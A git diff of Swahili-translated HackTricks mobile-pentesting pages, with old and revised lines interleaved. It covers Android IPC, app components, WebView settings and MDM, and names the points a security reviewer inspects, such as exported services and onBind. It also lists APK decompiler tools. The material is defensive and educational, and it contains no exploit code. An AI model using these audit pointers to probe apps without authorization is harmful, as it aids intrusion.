**Lugha ya Ufafanuzi wa Interface ya Android (AIDL)** imeundwa kwa ajili ya kurahisisha mawasiliano kati ya mteja na huduma kwenye programu za Android kupitia **mawasiliano kati ya michakato** (IPC). Kwa kuwa kupata moja kwa moja kumbukumbu ya michakato mingine haikubaliki kwenye Android, AIDL inasahilisha mchakato kwa kubadilisha vitu kuwa muundo unaoeleweka na mfumo wa uendeshaji, hivyo kurahisisha mawasiliano kati ya michakato tofauti.
**Android Interface Definition Language (AIDL)** imeundwa ili kuwezesha mawasiliano kati ya mteja na huduma katika programu za Android kupitia **mawasiliano kati ya michakato** (IPC). Kwa kuwa upatikanaji wa kumbukumbu ya mchakato mwingine moja kwa moja haukubaliwi kwenye Android, AIDL inarahisisha mchakato kwa kuhamasisha vitu katika muundo unaoeleweka na mfumo wa uendeshaji, hivyo kurahisisha mawasiliano kati ya michakato tofauti.
### Dhana Kuu
### Mifano Muhimu
- **Huduma Zilizounganishwa**: Huduma hizi hutumia AIDL kwa IPC, kuruhusu shughuli au sehemu kuunganisha kwenye huduma, kutuma maombi, na kupokea majibu. Mbinu ya `onBind` kwenye darasa la huduma ni muhimu kwa kuanzisha mwingiliano, ikiiweka kama eneo muhimu sana la ukaguzi wa usalama kutafuta mapungufu.
- **Huduma Zilizofungwa**: Huduma hizi hutumia AIDL kwa IPC, zikiwezesha shughuli au vipengele kuungana na huduma, kufanya maombi, na kupokea majibu. Njia ya `onBind` katika darasa la huduma ni muhimu kwa kuanzisha mwingiliano, ikifanya kuwa eneo muhimu kwa ukaguzi wa usalama kutafuta udhaifu.
- **Mtume (Messenger)**: Kufanya kazi kama huduma iliyounganishwa, Mtume inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia mbinu ya `onBind`. Ni muhimu kukagua mbinu hii kwa karibu kwa namna yoyote ya kushughulikia data kwa usalama au utekelezaji wa kazi nyeti.
- **Messenger**: Ikifanya kazi kama huduma iliyo fungwa, Messenger inarahisisha IPC kwa kuzingatia usindikaji wa data kupitia njia ya `onBind`. Ni muhimu kukagua njia hii kwa karibu kwa usimamizi usio salama wa data au utekelezaji wa kazi nyeti.
- **Kifungu (Binder)**: Ingawa matumizi moja kwa moja ya darasa la Binder ni nadra kutokana na ujumuishaji wa AIDL, ni faida kuelewa kuwa Binder hufanya kazi kama dereva wa kiwango cha kernel kurahisisha uhamishaji wa data kati ya nafasi za kumbukumbu za michakato tofauti. Kwa uelewa zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
- **Binder**: Ingawa matumizi ya moja kwa moja ya darasa la Binder si ya kawaida sana kutokana na ufafanuzi wa AIDL, ni muhimu kuelewa kwamba Binder inafanya kazi kama dereva wa kiwango cha kernel unawezesha uhamasishaji wa data kati ya maeneo ya kumbukumbu ya michakato tofauti. Kwa ufahamu zaidi, rasilimali inapatikana kwenye [https://www.youtube.com/watch?v=O-UHvFjxwZ8](https://www.youtube.com/watch?v=O-UHvFjxwZ8).
## Vipengele
Hivi ni pamoja na: **Shughuli (Activities), Huduma (Services), Wapokeaji wa Matangazo (Broadcast Receivers) na Watoaji (Providers).**
Hizi ni pamoja na: **Shughuli, Huduma, Vastika za Matangazo na Watoa Huduma.**
### Shughuli ya Kuzindua na shughuli nyingine
### Shughuli ya Kuanza na shughuli nyingine
Kwenye programu za Android, **shughuli (activities)** ni kama skrini, zikionyesha sehemu tofauti za interface ya mtumiaji wa programu. Programu inaweza kuwa na shughuli nyingi, kila moja ikiwasilisha skrini ya kipekee kwa mtumiaji.
Katika programu za Android, **shughuli** ni kama skrini, zikionyesha sehemu tofauti za kiolesura cha mtumiaji wa programu. Programu inaweza kuwa na shughuli nyingi, kila moja ikionyesha skrini ya kipekee kwa mtumiaji.
**Shughuli ya kuzindua (launcher activity)** ni lango kuu kwenye programu, inayoanzishwa unapobonyeza alama ya programu. Imedefiniwa kwenye faili ya maelezo ya programu na nia maalum za MAIN na LAUNCHER:
**Shughuli ya kuanza** ni lango kuu la programu, inayozinduliwa unapobofya ikoni ya programu. Imefafanuliwa katika faili ya manifest ya programu kwa nia maalum za MAIN na LAUNCHER:
```markup
<activity android:name=".LauncherActivity">
<intent-filter>
@ -264,19 +266,19 @@ Kwenye programu za Android, **shughuli (activities)** ni kama skrini, zikionyesh
</intent-filter>
</activity>
```
Haitaji shughuli ya kuzindua, hasa zile bila kiolesura cha mtumiaji, kama huduma za nyuma.
Sio programu zote zinahitaji shughuli ya kuzindua, hasa zile zisizo na kiolesura cha mtumiaji, kama huduma za nyuma.
Shughuli zinaweza kuwa zinapatikana kwa programu nyingine au michakato kwa kuziweka kama "zilizopatikana" kwenye hati ya maelekezo. Mipangilio hii inaruhusu programu nyingine kuanzisha shughuli hii:
Shughuli zinaweza kupatikana kwa programu nyingine au michakato kwa kuashiria kama "exported" katika hati. Mpangilio huu unaruhusu programu nyingine kuanzisha shughuli hii:
```markdown
<service android:name=".ExampleExportedService" android:exported="true"/>
```
Hata hivyo, kufikia shughuli kutoka kwa programu nyingine sio hatari ya usalama kila wakati. Wasiwasi unatokea ikiwa data nyeti inashirikishwa kwa njia isiyofaa, ambayo inaweza kusababisha kuvuja kwa habari.
Hata hivyo, kufikia shughuli kutoka programu nyingine si hatari ya usalama kila wakati. Wasiwasi unatokea ikiwa data nyeti inashirikiwa vibaya, ambayo inaweza kusababisha uvujaji wa taarifa.
**Mzunguko wa maisha ya shughuli** huanza na njia ya **onCreate**, kuweka UI na kujiandaa kwa shughuli kuingiliana na mtumiaji.
Mzunguko wa maisha wa shughuli **uanza na njia ya onCreate**, kuandaa UI na kuandaa shughuli kwa mwingiliano na mtumiaji.
### Darasa la Maombi
### Subclass ya Programu
Katika maendeleo ya Android, programu ina chaguo la kuunda **darasa la mshale** la [Maombi](https://developer.android.com/reference/android/app/Application) , ingawa sio lazima. Wakati darasa kama hilo la mshale linapofafanuliwa, linakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika darasa hili la mshale, inatekelezwa kabla ya njia ya **`onCreate`**. Hii inaruhusu kuanzisha mapema kabla ya sehemu nyingine ya maombi kuanza.
Katika maendeleo ya Android, programu ina chaguo la kuunda **subclass** ya [Application](https://developer.android.com/reference/android/app/Application) darasa, ingawa si lazima. Wakati subclass kama hiyo imefafanuliwa, inakuwa darasa la kwanza kuanzishwa ndani ya programu. Njia ya **`attachBaseContext`**, ikiwa imeanzishwa katika subclass hii, inatekelezwa kabla ya njia ya **`onCreate`**. Mpangilio huu unaruhusu kuanzishwa mapema kabla ya sehemu nyingine ya programu kuanza.
```java
public class MyApp extends Application {
@Override
@ -292,35 +294,35 @@ super.onCreate();
}
}
```
### Huduma
### Services
[Huduma](https://developer.android.com/guide/components/services) ni **wafanyikazi wa nyuma** wenye uwezo wa kutekeleza kazi bila kiolesura cha mtumiaji. Kazi hizi zinaweza kuendelea kufanya kazi hata wakati watumiaji wanabadilisha programu tofauti, hivyo huduma ni muhimu kwa **shughuli ndefu**.
[Services](https://developer.android.com/guide/components/services) ni **operatives za nyuma** zinazoweza kutekeleza kazi bila kiolesura cha mtumiaji. Kazi hizi zinaweza kuendelea kukimbia hata watumiaji wanapobadilisha programu, na kufanya huduma kuwa muhimu kwa **operesheni za muda mrefu**.
Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, na **Intents** ikiwa njia kuu ya kuziendesha kama sehemu ya kuingia ya programu. Mara tu huduma inapoanzishwa kwa kutumia njia ya `startService`, mbinu yake ya `onStart` huanza kufanya kazi na kuendelea hadi mbinu ya `stopService` itakapoitwa kwa uwazi. Vinginevyo, ikiwa jukumu la huduma linategemea uhusiano wa mteja ulio hai, njia ya `bindService` hutumiwa kuunganisha mteja na huduma, ikishirikisha mbinu ya `onBind` kwa kupitisha data.
Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, ambapo **Intents** ndiyo njia kuu ya kuzizindua kama kiingilio cha programu. Mara huduma inapozinduliwa kwa kutumia njia ya `startService`, njia yake ya `onStart` inaanza kufanya kazi na inaendelea kukimbia hadi njia ya `stopService` itakapoitwa wazi. Vinginevyo, ikiwa jukumu la huduma linategemea muunganisho wa mteja hai, njia ya `bindService` inatumika kuunganisha mteja na huduma, ikihusisha njia ya `onBind` kwa ajili ya kupitisha data.
Matumizi ya kuvutia ya huduma ni pamoja na kucheza muziki wa nyuma au kupata data ya mtandao bila kuzuia mwingiliano wa mtumiaji na programu. Zaidi ya hayo, huduma zinaweza kuwa kupatikana kwa michakato mingine kwenye kifaa kimoja kupitia **kupeleka**. Hii sio tabia ya msingi na inahitaji usanidi wa wazi kwenye faili ya Android Manifest:
Matumizi ya kuvutia ya huduma ni pamoja na upigaji muziki wa nyuma au upataji wa data ya mtandao bila kuingilia mwingiliano wa mtumiaji na programu. Aidha, huduma zinaweza kufanywa kupatikana kwa michakato mingine kwenye kifaa hicho hicho kupitia **exporting**. Hii si tabia ya kawaida na inahitaji usanidi wazi katika faili ya Android Manifest:
```xml
<service android:name=".ExampleExportedService" android:exported="true"/>
```
### Wapokeaji wa Matangazo
### Broadcast Receivers
**Wapokeaji wa matangazo** wanafanya kazi kama wasikilizaji katika mfumo wa ujumbe, kuruhusu programu nyingi kujibu ujumbe sawa kutoka kwa mfumo. Programu inaweza **kujiandikisha mpokeaji** kwa **njia mbili kuu**: kupitia **Mwongozo** wa programu au **kwa njia ya kudhibiti** ndani ya msimbo wa programu kupitia API ya **`registerReceiver`**. Katika Mwongozo, matangazo hufafanuliwa kwa idhini, wakati wapokeaji waliojiandikisha kwa njia ya kudhibiti wanaweza pia kufafanua idhini wakati wa usajili.
**Broadcast receivers** hufanya kazi kama wasikilizaji katika mfumo wa ujumbe, ikiruhusu programu nyingi kujibu ujumbe sawa kutoka kwa mfumo. Programu inaweza **kujiandikisha mpokeaji** kwa **njia mbili kuu**: kupitia **Manifest** ya programu au **kwa njia ya kidinamik** ndani ya msimbo wa programu kupitia **`registerReceiver`** API. Katika Manifest, matangazo yanachujwa kwa ruhusa, wakati wapokeaji waliojiandikisha kwa njia ya kidinamik wanaweza pia kubainisha ruhusa wakati wa kujiandikisha.
**Vichungi vya nia** ni muhimu katika njia zote za usajili, kufafanua ni matangazo gani yanachochea mpokeaji. Mara tu tangazo linalolingana linapotumwa, njia ya **`onReceive`** ya mpokeaji huitwa, ikiruhusu programu kurekebisha tabia kulingana, kama vile kurekebisha tabia kujibu onyo la betri iliyopungua.
**Intent filters** ni muhimu katika mbinu zote za kujiandikisha, zikiamua ni matangazo gani yanayochochea mpokeaji. Mara matangazo yanayolingana yanapotumwa, njia ya **`onReceive`** ya mpokeaji inaitwa, ikiruhusu programu kujibu ipasavyo, kama kubadilisha tabia kwa kujibu onyo la betri ya chini.
Matangazo yanaweza kuwa **ya kiasinkroni**, yakifikia wapokeaji wote bila mpangilio, au **ya kusinkroni**, ambapo wapokeaji wanapata tangazo kulingana na vipaumbele vilivyowekwa. Walakini, ni muhimu kutambua hatari ya usalama, kwani programu yoyote inaweza kujipa kipaumbele yenyewe ili kuingilia kati tangazo.
Matangazo yanaweza kuwa **asynchronous**, yakifika kwa wapokeaji wote bila mpangilio, au **synchronous**, ambapo wapokeaji wanapata matangazo kulingana na vipaumbele vilivyowekwa. Hata hivyo, ni muhimu kutambua hatari ya usalama, kwani programu yoyote inaweza kujipa kipaumbele ili kukamata tangazo.
Ili kuelewa utendaji wa mpokeaji, tafuta njia ya **`onReceive`** ndani ya darasa lake. Msimbo wa njia hii unaweza kubadilisha Nia iliyopokelewa, ikisisitiza umuhimu wa ukaguzi wa data na wapokeaji, hasa katika **Matangazo Yaliyoagizwa**, ambayo yanaweza kurekebisha au kudondosha Nia.
Ili kuelewa kazi ya mpokeaji, angalia njia ya **`onReceive`** ndani ya darasa lake. Msimbo wa njia hii unaweza kubadilisha Intent iliyopokelewa, ikionyesha umuhimu wa uthibitisho wa data na wapokeaji, hasa katika **Ordered Broadcasts**, ambazo zinaweza kubadilisha au kuacha Intent.
### Mtoaji wa Yaliyomo
### Content Provider
**Watoaji wa Yaliyomo** ni muhimu kwa **kushiriki data iliyopangiliwa** kati ya programu, ikisisitiza umuhimu wa kutekeleza **idhini** ili kuhakikisha usalama wa data. Wao huruhusu programu kupata data kutoka vyanzo mbalimbali, ikiwa ni pamoja na mabadiliko, mfumo wa faili, au wavuti. Idhini maalum, kama **`readPermission`** na **`writePermission`**, ni muhimu kwa kudhibiti upatikanaji. Aidha, upatikanaji wa muda unaweza kutolewa kupitia mipangilio ya **`grantUriPermission`** katika mwongozo wa programu, ikichangamana na sifa kama vile `path`, `pathPrefix`, na `pathPattern` kwa kudhibiti upatikanaji kwa undani.
**Content Providers** ni muhimu kwa **kushiriki data iliyopangwa** kati ya programu, ikisisitiza umuhimu wa kutekeleza **ruhusa** ili kuhakikisha usalama wa data. Wanaruhusu programu kufikia data kutoka vyanzo mbalimbali, ikiwa ni pamoja na hifadhidata, mifumo ya faili, au mtandao. Ruhusa maalum, kama **`readPermission`** na **`writePermission`**, ni muhimu kwa kudhibiti ufikiaji. Zaidi ya hayo, ufikiaji wa muda unaweza kutolewa kupitia mipangilio ya **`grantUriPermission`** katika manifest ya programu, ikitumia sifa kama `path`, `pathPrefix`, na `pathPattern` kwa udhibiti wa ufikiaji wa kina.
Uthibitishaji wa kuingiza ni muhimu kuzuia udhaifu, kama vile kuingizwa kwa SQL. Watoaji wa Yaliyomo hutoa operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, kurahisisha upangilizi wa data na kushiriki kati ya programu.
Uthibitisho wa ingizo ni muhimu ili kuzuia udhaifu, kama vile SQL injection. Content Providers zinasaidia operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, zikifanikisha usimamizi wa data na kushiriki kati ya programu.
**FileProvider**, Mtoaji wa Yaliyomo maalum, unazingatia kushiriki faili kwa usalama. Imefafanuliwa katika mwongozo wa programu na sifa maalum za kudhibiti upatikanaji wa folda, zikionyeshwa na `android:exported` na `android:resource` inayoelekeza kwa mipangilio ya folda. Tahadhari inashauriwa wakati wa kushiriki saraka ili kuepuka kufunua data nyeti kwa bahati mbaya.
**FileProvider**, Content Provider maalum, inazingatia kushiriki faili kwa usalama. Inafafanuliwa katika manifest ya programu kwa sifa maalum za kudhibiti ufikiaji wa folda, zinazoonyeshwa na `android:exported` na `android:resource` zikielekeza kwenye mipangilio ya folda. Tahadhari inashauriwa wakati wa kushiriki saraka ili kuepuka kufichua data nyeti bila kukusudia.
Mfano wa tangazo la mwongozo kwa FileProvider:
Mfano wa tangazo la manifest kwa FileProvider:
```xml
<provider android:name="androidx.core.content.FileProvider"
android:authorities="com.example.myapp.fileprovider"
@ -330,49 +332,49 @@ android:exported="false">
android:resource="@xml/filepaths" />
</provider>
```
Na mfano wa kueleza folda zilizoshirikiwa katika `filepaths.xml`:
Na mfano wa kufafanua folda zinazoshirikiwa katika `filepaths.xml`:
```xml
<paths>
<files-path path="images/" name="myimages" />
</paths>
```
Kwa maelezo zaidi angalia:
- [Waundaji wa Android: Watoa Huduma wa Yaliyomo](https://developer.android.com/guide/topics/providers/content-providers)
- [Waundaji wa Android: FileProvider](https://developer.android.com/training/secure-file-sharing/setup-sharing)
For further information check:
- [Android Developers: Content Providers](https://developer.android.com/guide/topics/providers/content-providers)
- [Android Developers: FileProvider](https://developer.android.com/training/secure-file-sharing/setup-sharing)
## WebViews
WebViews ni kama **vivinjari vidogo vya wavuti** ndani ya programu za Android, vikitoa yaliyomo kutoka kwenye wavuti au kutoka kwenye faili za ndani. Wanakabili hatari sawa na vivinjari vya kawaida, lakini kuna njia za **kupunguza hatari hizi** kupitia **vipimo maalum**.
WebViews ni kama **vivinjari vidogo vya wavuti** ndani ya programu za Android, vinavyovuta maudhui kutoka kwenye wavuti au kutoka kwenye faili za ndani. Vinakabiliwa na hatari sawa na vivinjari vya kawaida, lakini kuna njia za **kupunguza hatari hizi** kupitia **mipangilio** maalum.
Android inatoa aina mbili kuu za WebView:
- **WebViewClient** ni nzuri kwa HTML ya msingi lakini haisaidii kazi ya onyo ya JavaScript, ikibadilisha jinsi mashambulizi ya XSS yanavyoweza jaribiwa.
- **WebViewClient** ni nzuri kwa HTML ya msingi lakini haisaidii kazi ya arifa ya JavaScript, ikihusisha jinsi mashambulizi ya XSS yanavyoweza kupimwa.
- **WebChromeClient** inafanya kazi zaidi kama uzoefu kamili wa kivinjari cha Chrome.
Jambo muhimu ni kwamba vivinjari vya WebView **havishiriki vidakuzi** na kivinjari kikuu cha kifaa.
Kwa kupakia yaliyomo, njia kama ````loadUrl````, ````loadData````, na ````loadDataWithBaseURL```` zinapatikana. Ni muhimu kuhakikisha kuwa URL au faili hizi ni **salama kutumia**. Vipimo vya usalama vinaweza kusimamiwa kupitia darasa la ````WebSettings````. Kwa mfano, kulemaza JavaScript na ````setJavaScriptEnabled(false)```` kunaweza kuzuia mashambulizi ya XSS.
Kwa ajili ya kupakia maudhui, mbinu kama ````loadUrl````, ````loadData````, na ````loadDataWithBaseURL```` zinapatikana. Ni muhimu kuhakikisha URLs hizi au faili ni **salama kutumia**. Mipangilio ya usalama inaweza kudhibitiwa kupitia darasa la ````WebSettings````. Kwa mfano, kuzima JavaScript kwa ````setJavaScriptEnabled(false)```` kunaweza kuzuia mashambulizi ya XSS.
"Bridge" ya JavaScript inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji njia zitambuliwe na ````@JavascriptInterface```` kwa usalama kutoka Android 4.2 kuendelea.
JavaScript "Bridge" inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji mbinu kuwekewa alama na ````@JavascriptInterface```` kwa usalama kuanzia Android 4.2.
Kuruhusu ufikiaji wa yaliyomo (````setAllowContentAccess(true)````) inaruhusu WebViews kufikia Watoa Huduma wa Yaliyomo, ambayo inaweza kuwa hatari isipokuwa URL za yaliyomo zimehakikiwa kuwa salama.
Kuruhusu ufikiaji wa maudhui (````setAllowContentAccess(true)````) kunaruhusu WebViews kufikia Watoa Maudhui, ambayo inaweza kuwa hatari isipokuwa URLs za maudhui zihakikishwe kuwa salama.
Kudhibiti ufikiaji wa faili:
- Kulemaza ufikiaji wa faili (````setAllowFileAccess(false)````) kunapunguza ufikiaji wa mfumo wa faili, na ubaguzi kwa mali fulani, kuhakikisha zinatumika tu kwa yaliyomo isiyo nyeti.
Ili kudhibiti ufikiaji wa faili:
- Kuzima ufikiaji wa faili (````setAllowFileAccess(false)````) kunapunguza ufikiaji wa mfumo wa faili, huku kukiwa na visamaha kwa mali fulani, kuhakikisha zinatumika tu kwa maudhui yasiyo nyeti.
## Vipengele vingine vya Programu na Usimamizi wa Kifaa cha Mkononi
## Other App Components and Mobile Device Management
### **Kusainiwa Kidijitali kwa Programu**
### **Digital Signing of Applications**
- **Kusainiwa kidijitali** ni lazima kwa programu za Android, ikihakikisha zimeandikwa **kwa uhalisia** kabla ya usakinishaji. Mchakato huu hutumia cheti kwa utambulisho wa programu na lazima ithibitishwe na msimamizi wa pakiti ya kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zilizojisaini au kuthibitishwa na CA ya nje**, zikilinda dhidi ya ufikiaji usioruhusiwa na kuhakikisha programu inabaki bila kuguswa wakati wa kufikishwa kwenye kifaa.
- **Sahihi ya kidijitali** ni lazima kwa programu za Android, kuhakikisha zimeandikwa **kwa njia halisi** kabla ya usakinishaji. Mchakato huu unatumia cheti kwa ajili ya utambulisho wa programu na lazima uhakikishwe na meneja wa pakiti wa kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zimejitia saini au kuthibitishwa na CA ya nje**, kulinda dhidi ya ufikiaji usioidhinishwa na kuhakikisha programu inabaki bila kubadilishwa wakati wa usafirishaji wake kwa kifaa.
### **Uhakiki wa Programu kwa Usalama Ulioboreshwa**
### **App Verification for Enhanced Security**
- Kuanzia **Android 4.2**, kipengele kinachoitwa **Thibitisha Programu** kuruhusu watumiaji kupata programu zilizochunguzwa kwa usalama kabla ya usakinishaji. Mchakato huu wa **uhakiki** unaweza kuonya watumiaji dhidi ya programu zenye hatari, au hata kuzuia usakinishaji wa zile zenye nia hasidi, kuboresha usalama wa mtumiaji.
- Kuanzia **Android 4.2**, kipengele kinachoitwa **Verify Apps** kinawaruhusu watumiaji kuangalia programu kwa usalama kabla ya usakinishaji. Mchakato huu wa **uthibitishaji** unaweza kuwatahadharisha watumiaji dhidi ya programu zinazoweza kuwa hatari, au hata kuzuia usakinishaji wa zile zenye uharibifu mkubwa, kuimarisha usalama wa mtumiaji.
### **Usimamizi wa Kifaa cha Mkononi (MDM)**
### **Mobile Device Management (MDM)**
- **Suluhisho za MDM** hutoa **usimamizi na usalama** kwa vifaa vya mkononi kupitia **API ya Usimamizi wa Kifaa**. Wanahitaji usakinishaji wa programu ya Android kusimamia na kuhakikisha usalama wa vifaa vya mkononi kwa ufanisi. Majukumu muhimu ni pamoja na **kuweka sera za nywila**, **kuamuru kifaa cha kifaa**, na **kuruhusu kufuta data kwa mbali**, kuhakikisha udhibiti na usalama kamili juu ya vifaa vya mkononi.
- **MDM solutions** zinatoa **uangalizi na usalama** kwa vifaa vya simu kupitia **Device Administration API**. Zinahitaji usakinishaji wa programu ya Android ili kudhibiti na kulinda vifaa vya simu kwa ufanisi. Kazi kuu ni pamoja na **kulazimisha sera za nywila**, **kulazimisha usimbaji wa hifadhi**, na **kuruhusu kufuta data kwa mbali**, kuhakikisha udhibiti na usalama wa kina juu ya vifaa vya simu.
```java
// Example of enforcing a password policy with MDM
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);
@ -383,22 +385,23 @@ if (dpm.isAdminActive(adminComponent)) {
dpm.setPasswordMinimumLength(adminComponent, 8);
}
```
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

74
mobile-pentesting/android-app-pentesting/apk-decompilers.md
View file

@ -1,85 +1,73 @@
# Wadecompilers wa APK
# APK decompilers
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{% endhint %}
**Kwa maelezo zaidi kuhusu kila chombo angalia chapisho halisi kutoka [https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr](https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr)**
**Kwa maelezo zaidi kuhusu kila chombo angalia chapisho la asili kutoka [https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr](https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr)**
### [JD-Gui](https://github.com/java-decompiler/jd-gui)
Kama decompiler ya kwanza ya GUI ya Java, **JD-Gui** inakuwezesha kuchunguza nambari ya Java ndani ya faili za APK. Ni rahisi kutumia; baada ya kupata APK, tuifungue na JD-Gui ili tuchunguze nambari.
Kama decompiler ya GUI ya kwanza ya Java, **JD-Gui** inakuwezesha kuchunguza msimbo wa Java ndani ya faili za APK. Ni rahisi kutumia; baada ya kupata APK, fungua tu na JD-Gui ili kukagua msimbo.
### [Jadx](https://github.com/skylot/jadx)
**Jadx** inatoa kiolesura rahisi cha mtumiaji kwa kudecompile nambari ya Java kutoka kwenye programu za Android. Inapendekezwa kwa urahisi wake wa matumizi kwenye majukwaa tofauti.
**Jadx** inatoa kiolesura rafiki kwa mtumiaji kwa ajili ya decompiling msimbo wa Java kutoka kwa programu za Android. Inapendekezwa kwa urahisi wake wa matumizi kwenye majukwaa tofauti.
- Ili kuzindua GUI, nenda kwenye saraka ya bin na tekeleza: `jadx-gui`
- Kwa matumizi ya mstari wa amri, kudecompile APK na: `jadx app.apk`
- Ili kubainisha saraka ya pato au kurekebisha chaguo za kudecompile: `jadx app.apk -d <njia ya saraka ya pato> --no-res --no-src --no-imports`
- Kwa matumizi ya mstari wa amri, decompile APK kwa: `jadx app.apk`
- Ili kubainisha saraka ya matokeo au kurekebisha chaguzi za decompilation: `jadx app.apk -d <path to output dir> --no-res --no-src --no-imports`
### [GDA-android-reversing-Tool](https://github.com/charles2gan/GDA-android-reversing-Tool)
**GDA**, chombo kinachofanya kazi tu kwenye Windows, kinatoa huduma nyingi za kurekebisha programu za Android. Sakinisha na endesha GDA kwenye mfumo wako wa Windows, kisha pakia faili ya APK kwa uchambuzi.
**GDA**, chombo cha Windows pekee, kinatoa vipengele vingi kwa ajili ya uhandisi wa nyuma wa programu za Android. Sakinisha na endesha GDA kwenye mfumo wako wa Windows, kisha pakua faili ya APK kwa uchambuzi.
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
Kwa kutumia **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers kadhaa. Baada ya kupakua, endesha Bytecode-Viewer, pakia APK yako, na chagua decompilers unayotaka kutumia kwa uchambuzi wa wakati mmoja.
